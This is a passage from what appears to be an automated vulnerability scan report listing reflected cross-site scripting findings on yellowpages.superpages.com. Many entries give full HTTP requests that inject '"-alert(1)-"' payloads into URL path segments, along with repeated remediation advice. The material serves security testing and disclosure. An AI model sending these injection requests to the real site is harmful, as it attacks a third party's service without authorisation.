Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
